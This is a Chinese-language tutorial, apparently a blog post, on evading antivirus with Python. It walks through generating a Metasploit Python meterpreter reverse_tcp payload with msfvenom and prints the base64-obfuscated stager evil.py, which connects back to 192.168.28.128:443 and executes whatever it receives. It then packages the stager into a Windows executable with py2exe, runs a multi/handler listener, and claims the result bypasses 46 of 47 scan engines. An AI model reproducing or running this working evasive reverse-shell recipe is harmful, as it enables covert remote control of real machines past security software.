很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?
打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。
0x01 环境准备
1、软件安装
1 2 | Python <SPAN style="COLOR: #008080" class=hljs-number>2.7</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.16</SPAN> x86:https://www.python.org/ftp/python/<SPAN style="COLOR: #008080" class=hljs-number>2.7</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.16</SPAN>/python-<SPAN style="COLOR: #008080" class=hljs-number>2.7</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.16</SPAN>.msi Py2exe <SPAN style="COLOR: #008080" class=hljs-number>32</SPAN>位:https://sourceforge.net/projects/py2exe/files/py2exe/<SPAN style="COLOR: #008080" class=hljs-number>0.6</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.9</SPAN>/py2exe-<SPAN style="COLOR: #008080" class=hljs-number>0.6</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.9</SPAN>.win32-py2<SPAN style="COLOR: #008080" class=hljs-number>.7</SPAN>.exe/download |
2、msfvenom生成Python Payload
1 | msfvenom -p python/meterpreter/reverse_tcp LHOST=<SPAN style="COLOR: #008080" class=hljs-number>192.168</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.28</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.128</SPAN> LPORT=<SPAN style="COLOR: #008080" class=hljs-number>443</SPAN> -f raw -o /var/www/html/evil.py |
evil.py 代码如下:
1 | <SPAN style="COLOR: #333333; FONT-WEIGHT: bold" class=hljs-keyword>import</SPAN> base64,sys;exec(base64.b64decode({<SPAN style="COLOR: #008080" class=hljs-number>2</SPAN>:str,<SPAN style="COLOR: #008080" class=hljs-number>3</SPAN>:<SPAN style="COLOR: #333333; FONT-WEIGHT: bold" class=hljs-keyword>lambda</SPAN> b:bytes(b,<SPAN style="COLOR: #dd1144" class=hljs-string>'UTF-8'</SPAN>)}[sys.version_info[<SPAN style="COLOR: #008080" class=hljs-number>0</SPAN>]](<SPAN style="COLOR: #dd1144" class=hljs-string>'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK'</SPAN>))) |
0x02 py2exe 打包Python程序
将evil.py复制到windows,同时创建一个setup.py文件:
1 2 3 4 5 6 7 8 9 10 | <SPAN style="COLOR: #333333; FONT-WEIGHT: bold" class=hljs-keyword>from</SPAN> distutils.core <SPAN style="COLOR: #333333; FONT-WEIGHT: bold" class=hljs-keyword>import</SPAN> setup <SPAN style="COLOR: #333333; FONT-WEIGHT: bold" class=hljs-keyword>import</SPAN> py2exe setup( name = <SPAN style="COLOR: #dd1144" class=hljs-string>'Meter'</SPAN>, description = <SPAN style="COLOR: #dd1144" class=hljs-string>'Python-based App'</SPAN>, version = <SPAN style="COLOR: #dd1144" class=hljs-string>'1.0'</SPAN>, console=[<SPAN style="COLOR: #dd1144" class=hljs-string>'evil.py'</SPAN>], options = {<SPAN style="COLOR: #dd1144" class=hljs-string>'py2exe'</SPAN>: {<SPAN style="COLOR: #dd1144" class=hljs-string>'bundle_files'</SPAN>: <SPAN style="COLOR: #008080" class=hljs-number>1</SPAN>,<SPAN style="COLOR: #dd1144" class=hljs-string>'packages'</SPAN>:<SPAN style="COLOR: #dd1144" class=hljs-string>'ctypes'</SPAN>,<SPAN style="COLOR: #dd1144" class=hljs-string>'includes'</SPAN>: <SPAN style="COLOR: #dd1144" class=hljs-string>'base64,sys,socket,struct,time,code,platform,getpass,shutil'</SPAN>,}}, zipfile = <SPAN style="COLOR: #333333; FONT-WEIGHT: bold" class=hljs-keyword>None</SPAN>, ) |
下面的方法运行 evil.py,生成可执行文件。
1 | python ./setup.py py2exe |
0x03 设置监听端口
Kali 运行Metasploit,设置监听:
1 2 3 4 5 6 | msfconsole use exploit/multi/handler set PAYLOAD python/meterpreter/reverse_tcp set LHOST <SPAN style="COLOR: #008080" class=hljs-number>192.168</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.28</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.128</SPAN> set LPORT <SPAN style="COLOR: #008080" class=hljs-number>443</SPAN> run |
在Windows中运行evil.exe,获得一个meterpreter的会话
0x04 免杀验证
确认生成的exe文件可正常工作,接下来对evil.exe进行在线病毒扫描,以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎
扫描结果:47款杀毒引擎中,只有一个引擎报毒,主流的杀毒软件全部绕过。
1 | 网站地址:http://www.virscan.org |
参考文章:
https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1